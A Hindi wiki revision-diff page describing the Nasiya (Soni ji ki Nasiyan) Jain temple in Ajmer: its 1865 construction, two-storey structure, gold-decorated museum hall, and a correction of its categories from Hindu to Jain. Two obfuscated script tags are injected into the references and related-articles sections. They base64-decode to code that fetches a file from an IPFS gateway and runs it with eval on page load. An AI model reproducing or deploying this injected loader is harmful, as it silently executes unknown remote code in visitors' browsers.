Difference between revisions of "नासिया मंदिर, अजमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''नासिया मंदिर''' अजमेर, राजस्थान का प्रसिद्ध पर्...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
 +
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=Soniji-Ki-Nasiyan-Jain-Temple-Ajmer.jpg
 +
|चित्र का नाम=नासिया मंदिर, अजमेर
 +
|विवरण='नासिया मंदिर' [[अजमेर]] का प्रसिद्ध तीर्थ स्थान है। यह मंदिर प्रथम [[जैन तीर्थंकर]] [[भगवान आदिनाथ]] को समर्पित है।
 +
|शीर्षक 1=राज्य
 +
|पाठ 1=[[राजस्थान]]
 +
|शीर्षक 2=शहर
 +
|पाठ 2=[[अजमेर]]
 +
|शीर्षक 3=धर्म
 +
|पाठ 3=[[जैन धर्म|जैन]]
 +
|शीर्षक 4=देवता
 +
|पाठ 4=[[भगवान आदिनाथ]]
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी=यह मंदिर 'सोनी जी की नसियाँ' नाम से भी प्रसिद्ध है। मंदिर की संरचना दो मंजिली है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
'''नासिया मंदिर''' [[अजमेर]], [[राजस्थान]] का प्रसिद्ध पर्यटन स्थल है। इसे 'लाल मंदिर' भी कहा जाता है। इसका निर्माण [[1865]] ई. में हुआ था और यह अजमेर में पृथ्वीराज मार्ग पर स्थित है।<ref>{{cite web |url=http://hindi.nativeplanet.com/ajmer/attractions/nasiyan-temple/|title=नासिया मंदिर, अजमेर |accessmonthday= 28 जनवरी|accessyear= 2017|last= |first= |authorlink= |format= |publisher=hindi.nativeplanet.com |language= हिंदी}}</ref>
 
'''नासिया मंदिर''' [[अजमेर]], [[राजस्थान]] का प्रसिद्ध पर्यटन स्थल है। इसे 'लाल मंदिर' भी कहा जाता है। इसका निर्माण [[1865]] ई. में हुआ था और यह अजमेर में पृथ्वीराज मार्ग पर स्थित है।<ref>{{cite web |url=http://hindi.nativeplanet.com/ajmer/attractions/nasiyan-temple/|title=नासिया मंदिर, अजमेर |accessmonthday= 28 जनवरी|accessyear= 2017|last= |first= |authorlink= |format= |publisher=hindi.nativeplanet.com |language= हिंदी}}</ref>
 
*मंदिर की संरचना दो मंजिली है, जो प्रथम [[जैन तीर्थंकर]] [[भगवान आदिनाथ]] को समर्पित है।
 
*मंदिर की संरचना दो मंजिली है, जो प्रथम [[जैन तीर्थंकर]] [[भगवान आदिनाथ]] को समर्पित है।
Line 4: Line 33:
 
*संग्रहालय की आंतरिक संरचना सोने की बनी हुई है और यह भगवान आदिनाथ के जीवन के पाँच चरणों, जिन्हें 'पंच कल्याणक' कहा जाता है, को दर्शाती है। इसका क्षेत्र 3200 वर्ग फुट है और यह बेल्जियम के रंगीन काँच, खनिज रंगों और रंगीन काँचों से सुसज्जित है।
 
*संग्रहालय की आंतरिक संरचना सोने की बनी हुई है और यह भगवान आदिनाथ के जीवन के पाँच चरणों, जिन्हें 'पंच कल्याणक' कहा जाता है, को दर्शाती है। इसका क्षेत्र 3200 वर्ग फुट है और यह बेल्जियम के रंगीन काँच, खनिज रंगों और रंगीन काँचों से सुसज्जित है।
 
*इसके केंद्र में एक कक्ष है, जो [[सोना|सोने]] और [[चाँदी]] से सुसज्जित है और इसे 'गोल्डन टेंपल' (स्वर्ण मंदिर) भी कहा जाता है। इस मंदिर में लकड़ी पर सोने का काम, काँच की नक्काशी और पेंटिंग भी देखने को मिलती है।
 
*इसके केंद्र में एक कक्ष है, जो [[सोना|सोने]] और [[चाँदी]] से सुसज्जित है और इसे 'गोल्डन टेंपल' (स्वर्ण मंदिर) भी कहा जाता है। इस मंदिर में लकड़ी पर सोने का काम, काँच की नक्काशी और पेंटिंग भी देखने को मिलती है।
*यह मंदिर 'सोनी जी की सैयां' नाम से भी प्रसिद्ध है। मंदिर का यह नाम ऐसा इसलिए पड़ा, क्योंकि यह मूल्यवान पत्थरों, सोने और चाँदी से सजा हुआ है।  
+
*यह मंदिर 'सोनी जी की नसियाँ' नाम से भी प्रसिद्ध है। मंदिर का यह नाम ऐसा इसलिए पड़ा, क्योंकि यह मूल्यवान पत्थरों, सोने और चाँदी से सजा हुआ है।  
  
  
Line 13: Line 42:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]][[Category:हिन्दू धार्मिक स्थल]][[Category:हिन्दू मन्दिर]][[Category:हिन्दू धर्म कोश]][[Category:पर्यटन कोश]]
+
[[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]][[Category:जैन धार्मिक स्थल]][[Category:जैन मन्दिर]][[Category:जैन धर्म कोश]][[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:37, 28 January 2017

nasiya mandir, ajamer
vivaran 'nasiya mandir' ajamer ka prasiddh tirth sthan hai. yah mandir pratham jain tirthankar bhagavan adinath ko samarpit hai.
rajy rajasthan
shahar ajamer
dharm jain
devata bhagavan adinath
any janakari yah mandir 'soni ji ki nasiyaan' nam se bhi prasiddh hai. mandir ki sanrachana do manjili hai.

nasiya mandir ajamer, rajasthan ka prasiddh paryatan sthal hai. ise 'lal mandir' bhi kaha jata hai. isaka nirman 1865 ee. mean hua tha aur yah ajamer mean prithviraj marg par sthit hai.[1]

  • mandir ki sanrachana do manjili hai, jo pratham jain tirthankar bhagavan adinath ko samarpit hai.
  • bhavan do bhagoan mean bana hua hai- ek bhag jo pooja ka kshetr hai, jahaan bhagavan adinath ki moorti hai aur doosare bhag mean ek kaksh hai, jahaan sangrahalay hai.
  • sangrahalay ki aantarik sanrachana sone ki bani huee hai aur yah bhagavan adinath ke jivan ke paanch charanoan, jinhean 'panch kalyanak' kaha jata hai, ko darshati hai. isaka kshetr 3200 varg phut hai aur yah beljiyam ke rangin kaanch, khanij rangoan aur rangin kaanchoan se susajjit hai.
  • isake keandr mean ek kaksh hai, jo sone aur chaandi se susajjit hai aur ise 'goldan teanpal' (svarn mandir) bhi kaha jata hai. is mandir mean lak di par sone ka kam, kaanch ki nakkashi aur peantiang bhi dekhane ko milati hai.
  • yah mandir 'soni ji ki nasiyaan' nam se bhi prasiddh hai. mandir ka yah nam aisa isalie p da, kyoanki yah moolyavan pattharoan, sone aur chaandi se saja hua hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. nasiya mandir, ajamer (hiandi) hindi.nativeplanet.com. abhigaman tithi: 28 janavari, 2017.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>